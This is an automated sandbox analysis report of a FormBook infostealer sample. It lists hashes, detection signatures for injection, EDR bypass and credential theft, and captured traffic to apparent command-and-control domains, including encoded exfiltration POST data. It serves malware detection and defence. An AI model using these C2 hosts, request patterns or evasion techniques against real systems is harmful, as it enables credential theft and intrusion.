Windows Analysis Report
Order SO311180.exe

Overview

General Information

Sample name: Order SO311180.exe
Analysis ID: 1545977
MD5: 41886bf229bc21ea268c47f9de85abb2
SHA1: 9b1231e42b6bd7b0abbc47a080293dab2419868d
SHA256: cc3fe65f9d8dc99dd62570dbc56059d89d93676f54ec85b40e4f7f109469a2a7
Tags: exeuser-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Order SO311180.exe ReversingLabs: Detection: 52%
Yara detected FormBook
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3419404921.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685441163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3420187302.0000000001280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421857205.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421923997.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685875397.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3421898529.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2688650514.0000000001BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Order SO311180.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Order SO311180.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Order SO311180.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: EhStorAuthn.pdbGCTL source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000003.2630488308.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000002.3420777214.0000000000B87000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GfSuWuMUukRRDP.exe, 00000006.00000002.3420506622.0000000000AAE000.00000002.00000001.01000000.0000000C.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000000.2764840219.0000000000AAE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Order SO311180.exe, 00000003.00000002.2686263558.0000000001850000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2688036889.0000000004E16000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.000000000515E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2685808951.0000000004C64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Order SO311180.exe, Order SO311180.exe, 00000003.00000002.2686263558.0000000001850000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000007.00000003.2688036889.0000000004E16000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.000000000515E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2685808951.0000000004C64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EhStorAuthn.pdb source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000003.2630488308.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000002.3420777214.0000000000B87000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030BC270 FindFirstFileW,FindNextFileW,FindClose, 7_2_030BC270
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 4x nop then xor eax, eax 7_2_030A9DA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 4x nop then mov ebx, 00000004h 7_2_053104E8
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.20.84.62 52.20.84.62
Source: Joe Sandbox View IP Address: 3.33.130.190 3.33.130.190
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49767
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49933
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /4d7f/?yvsLS=4RrPNjhX4v&8XCl=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcTdApV0AY1UFCgokq6TFyr/YFpy4hrd6Qy8FR+WKPf+6hCwHCnkk= HTTP/1.1Host: www.trifecta.centerAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
Source: global traffic HTTP traffic detected: GET /qfwu/?8XCl=6fCxb2xLzjzF4nD7KjQhWEUB1Dc/xE2Ac7kR0Mi0XoRopjw7HNNCf6pSJ3AnVDHsLPCXmSmdJmWxpgfBXwwA5t6gIQ/Cna8saLmgT8gs4Z7leSM87MtPn4jvikK4JHq2+PAUNMc=&yvsLS=4RrPNjhX4v HTTP/1.1Host: www.seraph.bestAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
Source: global traffic HTTP traffic detected: GET /o5fg/?8XCl=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJZ98SsCn0nC0Ik21bS5JVWHE+LkgK3JQJVh0EnUQYNAjBF31c1vc=&yvsLS=4RrPNjhX4v HTTP/1.1Host: www.owinvip.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
Source: global traffic HTTP traffic detected: GET /9rsa/?8XCl=MJaEnwMoptGuAyQmB3iPl7F+p8qtmKUBGuoMdJ29iBxpANTscusPMMCgTv6bu6SX3cIivBJkXrMlI2rZEQxlKspg1QaKZCcrVeHixY1fXHhPEmgxmVDDzfXQ8vDPmCD1H+z4LW8=&yvsLS=4RrPNjhX4v HTTP/1.1Host: www.thefokusdong43.clickAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
Source: global traffic DNS traffic detected: DNS query: www.trifecta.center
Source: global traffic DNS traffic detected: DNS query: www.seraph.best
Source: global traffic DNS traffic detected: DNS query: www.owinvip.net
Source: global traffic DNS traffic detected: DNS query: www.thefokusdong43.click
Source: unknown HTTP traffic detected: POST /qfwu/ HTTP/1.1Host: www.seraph.bestAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.seraph.bestReferer: http://www.seraph.best/qfwu/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 209Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0Data Raw: 38 58 43 6c 3d 33 64 71 52 59 43 4a 6d 30 6a 6a 51 79 6e 58 68 4a 53 4a 54 43 78 73 4f 7a 67 49 48 33 6e 53 49 57 5a 30 49 31 4d 50 67 57 35 31 4f 30 53 49 31 46 64 31 36 49 50 4a 6f 4d 31 73 45 4c 53 44 7a 63 66 6d 51 69 68 36 4f 48 58 4b 70 72 53 62 4b 54 43 4e 72 6a 63 69 58 50 7a 72 35 6b 5a 38 69 43 61 2b 56 55 37 55 49 37 4a 6d 36 4f 54 63 6d 78 75 64 7a 71 2f 50 42 31 79 65 6e 4c 55 47 6f 6f 2b 4e 58 63 4b 68 58 42 4c 37 72 73 36 74 37 36 46 48 4e 36 65 34 31 62 54 4c 44 4c 6d 4a 39 6c 6d 50 61 50 32 78 6d 6a 74 72 41 55 43 7a 73 2b 48 39 64 4a 78 69 4b 76 6c 5a 67 6a 69 33 6a 4f 78 35 69 42 4a 54 35 46 46 62 4c Data Ascii: 8XCl=3dqRYCJm0jjQynXhJSJTCxsOzgIH3nSIWZ0I1MPgW51O0SI1Fd16IPJoM1sELSDzcfmQih6OHXKprSbKTCNrjciXPzr5kZ8iCa+VU7UI7Jm6OTcmxudzq/PB1yenLUGoo+NXcKhXBL7rs6t76FHN6e41bTLDLmJ9lmPaP2xmjtrAUCzs+H9dJxiKvlZgji3jOx5iBJT5FFbL
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 31 Oct 2024 10:06:21 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 31 Oct 2024 10:06:23 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 31 Oct 2024 10:06:26 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 31 Oct 2024 10:06:28 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: EhStorAuthn.exe, 00000007.00000002.3422809473.0000000005C16000.00000004.10000000.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3422059437.00000000037E6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.seraph.best/
Source: GfSuWuMUukRRDP.exe, 00000008.00000002.3420187302.00000000012E0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.thefokusdong43.click
Source: GfSuWuMUukRRDP.exe, 00000008.00000002.3420187302.00000000012E0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.thefokusdong43.click/9rsa/
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
